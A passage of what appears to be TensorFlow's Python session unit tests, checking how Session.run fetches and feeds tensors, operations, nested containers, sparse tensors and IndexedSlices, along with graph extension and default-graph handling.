    """Op errors expose the _original_op chain used for error attribution."""
    with session.Session() as sess:
      a = constant_op.constant(0.0, shape=[2, 3])
      # NOTE(mrry): The original_op is nonsense, but used here to test that the
      # errors are reported correctly.
      # pylint: disable=protected-access
      with sess.graph._original_op(a.op):
        b = array_ops.identity(a, name='id')
      with sess.graph._original_op(b.op):
        c = array_ops.placeholder(dtypes.float32)
      # pylint: enable=protected-access
      def exc_predicate(e):
        # The error op should chain back c -> b -> a via _original_op.
        return (e.op == c.op
                and e.op._original_op == b.op
                and e.op._original_op._original_op == a.op)
      with self.assertRaisesOpError(exc_predicate):
        c.eval()
  def testFetchNone(self):
    """Fetching None, alone or inside a structure, raises TypeError."""
    with session.Session() as s:
      a = constant_op.constant(1.0)
      with self.assertRaises(TypeError):
        s.run(None)
      with self.assertRaises(TypeError):
        s.run([None])
      with self.assertRaises(TypeError):
        s.run({'b': None})
      with self.assertRaises(TypeError):
        s.run({'a': a, 'b': None})
  def testFetchSingleton(self):
    """Fetching a single tensor returns its value; fetching an op gives None."""
    with session.Session() as sess:
      a = constant_op.constant(42.0)
      res = sess.run(a)
      self.assertEqual(42.0, res)
      res = sess.run(a.op)  # An op, not a tensor.
      self.assertEqual(None, res)
  def testFetchSingletonByName(self):
    """Fetching a tensor by its string name behaves like fetching the tensor."""
    with session.Session() as sess:
      a = constant_op.constant(42.0)
      res = sess.run(a.name)
      self.assertEqual(42.0, res)
      res = sess.run(a.op)  # An op, not a tensor.
      self.assertEqual(None, res)
  def testFetchList(self):
    """A list fetch returns a list, with None entries for op fetches."""
    with session.Session() as sess:
      a = constant_op.constant(42.0)
      b = control_flow_ops.no_op()  # An op, not a tensor.
      c = constant_op.constant(44.0)
      v = variables.Variable([54.0])
      assign = v.assign([63.0])
      res = sess.run([a, b, c, a.name, assign.op])
      self.assertTrue(isinstance(res, list))
      self.assertEqual(42.0, res[0])
      self.assertEqual(None, res[1])
      self.assertEqual(44.0, res[2])
      self.assertEqual(42.0, res[3])
      self.assertEqual(None, res[4])
      # The assign op fetched above must have run as a side effect.
      self.assertEqual(63.0, sess.run(v))
  def testFetchTuple(self):
    """A tuple fetch returns a tuple mirroring the fetch structure."""
    with session.Session() as sess:
      a = constant_op.constant(42.0)
      b = control_flow_ops.no_op()  # An op, not a tensor.
      c = constant_op.constant(44.0)
      res = sess.run((a, b, c, a.name))
      self.assertTrue(isinstance(res, tuple))
      self.assertEqual(42.0, res[0])
      self.assertEqual(None, res[1])
      self.assertEqual(44.0, res[2])
      self.assertEqual(42.0, res[3])
  def testFetchNamedTuple(self):
    """A namedtuple fetch returns the same namedtuple type with values."""
    # pylint: disable=invalid-name
    ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
    # pylint: enable=invalid-name
    with session.Session() as sess:
      a = constant_op.constant(42.0)
      b = control_flow_ops.no_op()  # An op, not a tensor.
      c = constant_op.constant(44.0)
      res = sess.run(ABC(a, b, c))
      self.assertTrue(isinstance(res, ABC))
      self.assertEqual(42.0, res.a)
      self.assertEqual(None, res.b)
      self.assertEqual(44.0, res.c)
  def testFetchDict(self):
    """A dict fetch returns a dict with the same keys and fetched values."""
    with session.Session() as sess:
      a = constant_op.constant(42.0)
      b = control_flow_ops.no_op()  # An op, not a tensor.
      c = constant_op.constant(44.0)
      res = sess.run({'a': a, 'b': b, 'c': c})
      self.assertTrue(isinstance(res, dict))
      self.assertEqual(42.0, res['a'])
      self.assertEqual(None, res['b'])
      self.assertEqual(44.0, res['c'])
  def testFetchNestingOneLevel(self):
    """One level of nesting: each container kind wrapping the other kinds.

    Verifies that lists, tuples, namedtuples, and dicts each preserve their
    own structure when they contain the other container kinds as elements,
    and that tensor-by-name fetches work inside nested structures.
    """
    with session.Session() as sess:
      # pylint: disable=invalid-name
      ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
      DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
      # pylint: enable=invalid-name
      a_val = 42.0
      b_val = None
      c_val = 44.0
      a = constant_op.constant(a_val)
      b = control_flow_ops.no_op()  # An op, not a tensor.
      c = constant_op.constant(c_val)
      # List of lists, tuples, namedtuple, and dict
      res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c),
                      {'a': a.name, 'c': c, 'b': b}])
      self.assertTrue(isinstance(res, list))
      self.assertTrue(isinstance(res[0], list))
      self.assertEqual(a_val, res[0][0])
      self.assertEqual(b_val, res[0][1])
      self.assertEqual(c_val, res[0][2])
      self.assertTrue(isinstance(res[1], tuple))
      self.assertEqual(a_val, res[1][0])
      self.assertEqual(b_val, res[1][1])
      self.assertEqual(c_val, res[1][2])
      self.assertTrue(isinstance(res[2], ABC))
      self.assertEqual(a_val, res[2].a)
      self.assertEqual(b_val, res[2].b)
      self.assertEqual(c_val, res[2].c)
      self.assertTrue(isinstance(res[3], dict))
      self.assertEqual(a_val, res[3]['a'])
      self.assertEqual(b_val, res[3]['b'])
      self.assertEqual(c_val, res[3]['c'])
      # Tuple of lists, tuples, namedtuple, and dict
      res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c),
                      {'a': a, 'c': c, 'b': b}))
      self.assertTrue(isinstance(res, tuple))
      self.assertTrue(isinstance(res[0], list))
      self.assertEqual(a_val, res[0][0])
      self.assertEqual(b_val, res[0][1])
      self.assertEqual(c_val, res[0][2])
      self.assertTrue(isinstance(res[1], tuple))
      self.assertEqual(a_val, res[1][0])
      self.assertEqual(b_val, res[1][1])
      self.assertEqual(c_val, res[1][2])
      self.assertTrue(isinstance(res[2], ABC))
      self.assertEqual(a_val, res[2].a)
      self.assertEqual(b_val, res[2].b)
      self.assertEqual(c_val, res[2].c)
      self.assertTrue(isinstance(res[3], dict))
      self.assertEqual(a_val, res[3]['a'])
      self.assertEqual(b_val, res[3]['b'])
      self.assertEqual(c_val, res[3]['c'])
      # Namedtuple of lists, tuples, namedtuples, and dict
      res = sess.run(DEFG(d=[a, b, c],
                          e=(a, b, c),
                          f=ABC(a=a.name, b=b, c=c),
                          g={'a': a, 'c': c, 'b': b}))
      self.assertTrue(isinstance(res, DEFG))
      self.assertTrue(isinstance(res.d, list))
      self.assertEqual(a_val, res.d[0])
      self.assertEqual(b_val, res.d[1])
      self.assertEqual(c_val, res.d[2])
      self.assertTrue(isinstance(res.e, tuple))
      self.assertEqual(a_val, res.e[0])
      self.assertEqual(b_val, res.e[1])
      self.assertEqual(c_val, res.e[2])
      self.assertTrue(isinstance(res.f, ABC))
      self.assertEqual(a_val, res.f.a)
      self.assertEqual(b_val, res.f.b)
      self.assertEqual(c_val, res.f.c)
      self.assertTrue(isinstance(res.g, dict))
      self.assertEqual(a_val, res.g['a'])
      self.assertEqual(b_val, res.g['b'])
      self.assertEqual(c_val, res.g['c'])
      # Dict of lists, tuples, namedtuples, and dict
      res = sess.run({'d': [a, b, c],
                      'e': (a, b, c),
                      'f': ABC(a=a, b=b, c=c),
                      'g': {'a': a.name, 'c': c, 'b': b}})
      self.assertTrue(isinstance(res, dict))
      self.assertTrue(isinstance(res['d'], list))
      self.assertEqual(a_val, res['d'][0])
      self.assertEqual(b_val, res['d'][1])
      self.assertEqual(c_val, res['d'][2])
      self.assertTrue(isinstance(res['e'], tuple))
      self.assertEqual(a_val, res['e'][0])
      self.assertEqual(b_val, res['e'][1])
      self.assertEqual(c_val, res['e'][2])
      self.assertTrue(isinstance(res['f'], ABC))
      self.assertEqual(a_val, res['f'].a)
      self.assertEqual(b_val, res['f'].b)
      self.assertEqual(c_val, res['f'].c)
      self.assertTrue(isinstance(res['g'], dict))
      self.assertEqual(a_val, res['g']['a'])
      self.assertEqual(b_val, res['g']['b'])
      self.assertEqual(c_val, res['g']['c'])
  def testFetchTensorObject(self):
    """Fetching Tensor objects via run/eval, singly and in structures."""
    with session.Session() as s:
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      results_with_list = s.run([c])
      self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
      results_with_single = s.run(c)
      self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
      results_with_get = c.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
      a_val, b_val = s.run([a, b])  # Test multiple fetches.
      self.assertAllEqual([[1.0, 1.0]], a_val)
      self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
      results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
      self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
      self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
                          results_with_dict['b'])
      self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
      self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
      # Test nested structures
      results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
      self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
      self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
                          results_with_nested_list[0][0][1])
      self.assertAllEqual(results_with_nested_list[0][0][0],
                          results_with_nested_list[1])
      self.assertAllEqual(results_with_nested_list[1],
                          results_with_nested_list[2][0])
      self.assertAllEqual(results_with_nested_list[0][0][1],
                          results_with_nested_list[0][1])
      self.assertAllEqual(results_with_nested_list[0][1],
                          results_with_nested_list[2][1])
  def testFetchScalar(self):
    """Scalar fetches preserve the numpy scalar type across fetch shapes."""
    with session.Session() as s:
      for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
        x = scalar(7)
        y = scalar(8)
        tf_x = constant_op.constant(x, shape=[])
        tf_y = constant_op.constant(y)
        tf_xy = math_ops.add(tf_x, tf_y)
        # Single fetch
        xy = s.run(tf_xy)
        self.assertEqual(scalar, type(xy))
        self.assertEqual(x + y, xy)
        # List fetch
        xy, = s.run([tf_xy])
        self.assertEqual(scalar, type(xy))
        self.assertEqual(x + y, xy)
        # Dict fetch
        xy = s.run({'xy': tf_xy})['xy']
        self.assertEqual(scalar, type(xy))
        self.assertEqual(x + y, xy)
        # Nested list fetch
        xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
        self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
        self.assertEqual(scalar, type(xy[0][0][0]))
        self.assertEqual(scalar, type(xy[1]))
        self.assertEqual(scalar, type(xy[2][0]))
  def testFetchOperationObject(self):
    """Running a variable's initializer op, then fetching its value."""
    with session.Session() as s:
      a = constant_op.constant(1.0, shape=[1, 2])
      v = variables.Variable(a, name='testFetchOperationObject_v')
      s.run(v.initializer)
      v_val = s.run(v)
      self.assertAllEqual([[1.0, 1.0]], v_val)
  def testFetchSparseTensor(self):
    """Fetching a SparseTensor yields a SparseTensorValue in every shape of
    fetch structure (single, tuple, list, dict, nested list)."""
    with session.Session() as s:
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      values = np.array([1.0, 2.0]).astype(np.float32)
      shape = np.array([7, 9, 2]).astype(np.int64)
      sp = ops.SparseTensor(
          constant_op.constant(indices),
          constant_op.constant(values),
          constant_op.constant(shape))
      # Single fetch, use as tuple
      sp_out = s.run(sp)
      indices_out, values_out, shape_out = sp_out
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Single fetch, use as SparseTensorValue
      sp_out = s.run(sp)
      self.assertAllEqual(sp_out.indices, indices)
      self.assertAllEqual(sp_out.values, values)
      self.assertAllEqual(sp_out.shape, shape)
      # Tuple fetch, use as tuple
      indices_out, values_out, shape_out = s.run(sp)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # List fetch, use as tuple
      (indices_out, values_out, shape_out), = s.run([sp])
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # List fetch, use as SparseTensorValue
      sp_out, = s.run([sp])
      self.assertAllEqual(sp_out.indices, indices)
      self.assertAllEqual(sp_out.values, values)
      self.assertAllEqual(sp_out.shape, shape)
      # Dict fetch (single value), use as tuple
      indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Dict fetch (list value), use as tuple
      (indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Dict fetch, use as SparseTensorValue
      sp_out = s.run({'sp': sp})['sp']
      self.assertAllEqual(sp_out.indices, indices)
      self.assertAllEqual(sp_out.values, values)
      self.assertAllEqual(sp_out.shape, shape)
      # Nested list fetch use as tuple
      sp_out = s.run([[[sp]], sp])
      indices_out, values_out, shape_out = sp_out[0][0][0]
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      indices_out, values_out, shape_out = sp_out[1]
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Nested list fetch, use as SparseTensorValue
      sp_out = s.run([[[sp]], sp])
      self.assertAllEqual(sp_out[0][0][0].indices, indices)
      self.assertAllEqual(sp_out[0][0][0].values, values)
      self.assertAllEqual(sp_out[0][0][0].shape, shape)
      self.assertAllEqual(sp_out[1].indices, indices)
      self.assertAllEqual(sp_out[1].values, values)
      self.assertAllEqual(sp_out[1].shape, shape)
  def testFeedSparseTensor(self):
    """Feeding a SparseTensor of placeholders with tuples and
    SparseTensorValues, fetching components and the SparseTensor itself."""
    with session.Session() as s:
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      values = np.array([1.0, 2.0]).astype(np.float32)
      shape = np.array([7, 9, 2]).astype(np.int64)
      sp = ops.SparseTensor(
          array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
          array_ops.placeholder(dtype=np.float32, shape=(2,)),
          array_ops.placeholder(dtype=np.int64, shape=(3,)),)
      sp_indices = array_ops.identity(sp.indices)
      sp_values = array_ops.identity(sp.values)
      sp_shape = array_ops.identity(sp.shape)
      sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
      # Feed with tuple
      indices_out, values_out, shape_out = s.run(
          [sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Feed with tuple, fetch sp directly
      sp_out = s.run(sp, {sp: (indices, values, shape)})
      self.assertAllEqual(sp_out.indices, indices)
      self.assertAllEqual(sp_out.values, values)
      self.assertAllEqual(sp_out.shape, shape)
      # Feed with SparseTensorValue
      indices_out, values_out, shape_out = s.run(
          [sp_indices, sp_values, sp_shape],
          {sp: ops.SparseTensorValue(indices, values, shape)})
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Feed with SparseTensorValue, fetch SparseTensorValue
      sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
      self.assertAllEqual(sp2_out.indices, indices)
      self.assertAllEqual(sp2_out.values, values)
      self.assertAllEqual(sp2_out.shape, shape)
      # Feed SparseTensorValue and fetch sp directly.
      sp_out = s.run(sp, {sp: ops.SparseTensorValue(indices, values, shape)})
      self.assertAllEqual(sp_out.indices, indices)
      self.assertAllEqual(sp_out.values, values)
      self.assertAllEqual(sp_out.shape, shape)
  def testFeedSparsePlaceholder(self):
    """Feeding a sparse_placeholder with tuples and SparseTensorValues."""
    with session.Session() as s:
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      values = np.array([1.0, 2.0]).astype(np.float32)
      shape = np.array([7, 9, 2]).astype(np.int64)
      sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
      sp_indices = array_ops.identity(sp.indices)
      sp_values = array_ops.identity(sp.values)
      sp_shape = array_ops.identity(sp.shape)
      sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
      # Feed with tuple
      indices_out, values_out, shape_out = s.run(
          [sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Feed with SparseTensorValue
      indices_out, values_out, shape_out = s.run(
          [sp_indices, sp_values, sp_shape],
          {sp: ops.SparseTensorValue(indices, values, shape)})
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
      # Feed with SparseTensorValue, fetch SparseTensorValue
      sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
      self.assertAllEqual(sp2_out.indices, indices)
      self.assertAllEqual(sp2_out.values, values)
      self.assertAllEqual(sp2_out.shape, shape)
  # NOTE(review): method name has a typo ("Spare" -> "Sparse"); kept as-is
  # since renaming would change the externally visible test name.
  def testFeedSparePlaceholderConstantShape(self):
    """A sparse_placeholder with a fixed shape needs only (indices, values)
    in the feed; its shape is a constant available without feeding."""
    with session.Session() as s:
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      values = np.array([1.0, 2.0]).astype(np.float32)
      shape = np.array([7, 9, 2]).astype(np.int64)
      sp = array_ops.sparse_placeholder(dtype=np.float32,
                                        shape=shape,
                                        name='placeholder1')
      self.assertAllEqual(sp.shape.eval(session=s), shape)
      self.assertAllEqual(tensor_util.constant_value(sp.shape), shape)
      sp_indices = array_ops.identity(sp.indices)
      sp_values = array_ops.identity(sp.values)
      sp_shape = array_ops.identity(sp.shape)
      # Feed with tuple
      indices_out, values_out, shape_out = s.run(
          [sp_indices, sp_values, sp_shape], {sp: (indices, values)})
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(shape_out, shape)
  def testFetchIndexedSlices(self):
    """Fetching an IndexedSlices yields an IndexedSlicesValue, usable as a
    (values, indices, dense_shape) tuple or by attribute."""
    with session.Session() as s:
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      values = np.array([1.0, 2.0]).astype(np.float32)
      dense_shape = np.array([7, 9, 2]).astype(np.int64)
      ind = ops.IndexedSlices(
          constant_op.constant(values), constant_op.constant(indices),
          constant_op.constant(dense_shape))
      # Single fetch, use as tuple
      ind_out = s.run(ind)
      values_out, indices_out, dense_shape_out = ind_out
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # Single fetch, use as IndexedSlicesValue
      ind_out = s.run(ind)
      self.assertAllEqual(ind_out.values, values)
      self.assertAllEqual(ind_out.indices, indices)
      self.assertAllEqual(ind_out.dense_shape, dense_shape)
      # Tuple fetch, use as tuple
      values_out, indices_out, dense_shape_out = s.run(ind)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # List fetch, use as tuple
      (values_out, indices_out, dense_shape_out), = s.run([ind])
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # List fetch, use as IndexedSlicesValue
      ind_out, = s.run([ind])
      self.assertAllEqual(ind_out.values, values)
      self.assertAllEqual(ind_out.indices, indices)
      self.assertAllEqual(ind_out.dense_shape, dense_shape)
  def testFeedIndexedSlices(self):
    """Feeding an IndexedSlices of placeholders with tuples and
    IndexedSlicesValues, and fetching an IndexedSlicesValue back."""
    with session.Session() as s:
      values = np.array([1.0, 2.0]).astype(np.float32)
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      dense_shape = np.array([7, 9, 2]).astype(np.int64)
      ind = ops.IndexedSlices(
          array_ops.placeholder(dtype=np.float32,
                                shape=(2,)),
          array_ops.placeholder(dtype=np.int64,
                                shape=(2, 3)),
          array_ops.placeholder(dtype=np.int64,
                                shape=(3,)),)
      ind_values = array_ops.identity(ind.values)
      ind_indices = array_ops.identity(ind.indices)
      ind_dense_shape = array_ops.identity(ind.dense_shape)
      ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
      # Feed with tuple
      values_out, indices_out, dense_shape_out = s.run(
          [ind_values, ind_indices, ind_dense_shape],
          {ind: (values, indices, dense_shape)})
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # Feed with IndexedSlicesValue
      values_out, indices_out, dense_shape_out = s.run(
          [ind_values, ind_indices, ind_dense_shape],
          {ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # Feed with IndexedSlicesValue, fetch IndexedSlicesValue
      ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
                                                          dense_shape)})
      self.assertAllEqual(ind2_out.values, values)
      self.assertAllEqual(ind2_out.indices, indices)
      self.assertAllEqual(ind2_out.dense_shape, dense_shape)
  def testFetchIndexedSlicesWithoutDenseShape(self):
    """Fetching an IndexedSlices whose dense_shape is None returns None for
    the dense_shape component in every fetch form."""
    with session.Session() as s:
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      values = np.array([1.0, 2.0]).astype(np.float32)
      dense_shape = None
      ind = ops.IndexedSlices(
          constant_op.constant(values), constant_op.constant(indices), None)
      # Single fetch, use as tuple
      ind_out = s.run(ind)
      values_out, indices_out, dense_shape_out = ind_out
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # Single fetch, use as IndexedSlicesValue
      ind_out = s.run(ind)
      self.assertAllEqual(ind_out.values, values)
      self.assertAllEqual(ind_out.indices, indices)
      self.assertAllEqual(ind_out.dense_shape, dense_shape)
      # Tuple fetch, use as tuple
      values_out, indices_out, dense_shape_out = s.run(ind)
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # List fetch, use as tuple
      (values_out, indices_out, dense_shape_out), = s.run([ind])
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      self.assertAllEqual(dense_shape_out, dense_shape)
      # List fetch, use as IndexedSlicesValue
      ind_out, = s.run([ind])
      self.assertAllEqual(ind_out.values, values)
      self.assertAllEqual(ind_out.indices, indices)
      self.assertAllEqual(ind_out.dense_shape, dense_shape)
  def testFeedIndexedSlicesWithoutDenseShape(self):
    """Feeding an IndexedSlices built without a dense_shape placeholder."""
    with session.Session() as s:
      values = np.array([1.0, 2.0]).astype(np.float32)
      indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
      dense_shape = None
      ind = ops.IndexedSlices(
          array_ops.placeholder(dtype=np.float32,
                                shape=(2,)),
          array_ops.placeholder(dtype=np.int64,
                                shape=(2, 3)),
          None)
      ind_values = array_ops.identity(ind.values)
      ind_indices = array_ops.identity(ind.indices)
      ind2 = ops.IndexedSlices(ind_values, ind_indices)
      # Feed with tuple
      values_out, indices_out = s.run(
          [ind_values, ind_indices], {ind: (values, indices)})
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      # Feed with IndexedSlicesValue
      values_out, indices_out = s.run(
          [ind_values, ind_indices],
          {ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
      self.assertAllEqual(values_out, values)
      self.assertAllEqual(indices_out, indices)
      # Feed with IndexedSlicesValue, fetch IndexedSlicesValue
      ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
                                                          dense_shape)})
      self.assertAllEqual(ind2_out.values, values)
      self.assertAllEqual(ind2_out.indices, indices)
      self.assertAllEqual(ind2_out.dense_shape, dense_shape)
  def testExtendWithStatelessOperations(self):
    """Ops added after a run() are picked up by a later run() (graph extend)."""
    with session.Session() as s:
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      c_val = s.run(c)
      self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
      d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
      e = math_ops.matmul(c, d)
      # Extend will happen here.
      e_val = s.run(e)
      self.assertAllEqual([[24.0]], e_val)
  def testExtendWithStatefulOperations(self):
    """Graph extend with stateful ops: a variable keeps its value until the
    assign op added after the extend is explicitly run."""
    with session.Session() as s:
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
      v.initializer.run()
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      d = constant_op.constant(3.0, shape=[2, 3])
      e = math_ops.matmul(a, d)
      assign_e_to_v = state_ops.assign(v, e)
      # Extend will happen here.
      e_val = e.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
      v_val = v.eval()
      # The assign op has not been run yet, so v is unchanged.
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      s.run(assign_e_to_v)
      v_val = v.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
  def testExtendWithGroupBy(self):
    """A group() of initializers created after an extend still runs both."""
    with session.Session() as s:
      a = constant_op.constant(1.0, shape=[1, 2])
      p = variables.Variable(a, name='testExtendWithGroupBy_p')
      a_val = a.eval()  # Force an Extend after this op.
      self.assertAllEqual([[1.0, 1.0]], a_val)
      b = constant_op.constant(2.0, shape=[1, 2])
      q = variables.Variable(b, name='testExtendWithGroupBy_q')
      # Extend will happen here.
      init = control_flow_ops.group(p.initializer, q.initializer)
      s.run(init)
      p_val, q_val = s.run([p, q])
      self.assertAllEqual([[1.0, 1.0]], p_val)
      self.assertAllEqual([[2.0, 2.0]], q_val)
  def testTensorGetMethod(self):
    """Tensor.eval() works with and without a feed_dict keyed by name."""
    with session.Session():
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      c_val = c.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
      fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
      self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
  def testOperationRunMethod(self):
    """Operation.run()/eval() executes assigns, with and without a feed."""
    with session.Session():
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[1, 2], name='b')
      v = variables.Variable(a, a.dtype)
      assign_a_to_v = state_ops.assign(v, a)
      assign_a_to_v.eval()
      v_val = v.eval()
      self.assertAllEqual([[1.0, 1.0]], v_val)
      assign_b_to_v = state_ops.assign(v, b)
      assign_b_to_v.eval()
      v_val = v.eval()
      self.assertAllEqual([[2.0, 2.0]], v_val)
      # Feeding 'b' by name overrides its constant value for this run.
      assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
      v_val = v.eval()
      self.assertAllEqual([[3.0, 3.0]], v_val)
  def testDefaultGraph(self):
    """Inside a Session context, the default graph is the session's graph."""
    with session.Session() as s:
      self.assertEqual(ops.get_default_graph(), s.graph)
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      self.assertEqual(ops.get_default_graph(), a.graph)
      self.assertEqual(ops.get_default_graph(), b.graph)
      c = math_ops.matmul(a, b)
      v = variables.Variable(c, name='testDefaultGraph_v')
      v.initializer.run()
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      d = constant_op.constant(3.0, shape=[2, 3])
      e = math_ops.matmul(a, d)
      assign_e_to_v = state_ops.assign(v, e)
      e_val = e.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
      v_val = v.eval()
      # The assign op has not been run yet, so v is unchanged.
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      s.run(assign_e_to_v)
      v_val = v.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
      self.assertEqual(ops.get_default_graph(), s.graph)
  def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
    """Worker body for testDefaultGraphWithThreads.

    Builds a per-thread graph, signals `constructed_event`, waits on
    `continue_event`, then exercises initialize/assign/eval on a variable
    named uniquely by thread index `i`.
    """
    with session.Session() as s:
      self.assertEqual(ops.get_default_graph(), s.graph)
      a = constant_op.constant(1.0, shape=[1, 2])
      b = constant_op.constant(2.0, shape=[2, 3])
      c = math_ops.matmul(a, b)
      v = variables.Variable(c, name='var_%d' % i)
      # Block here until all threads have constructed their graph.
      constructed_event.set()
      continue_event.wait()
      assign_c_to_v = state_ops.assign(v, c)
      v.initializer.run()
      assign_c_to_v.eval()
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      d = constant_op.constant(3.0, shape=[2, 3])
      e = math_ops.matmul(a, d)
      assign_e_to_v = state_ops.assign(v, e)
      e_val = e.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
      v_val = v.eval()
      self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
      s.run(assign_e_to_v)
      v_val = v.eval()
      self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
      self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
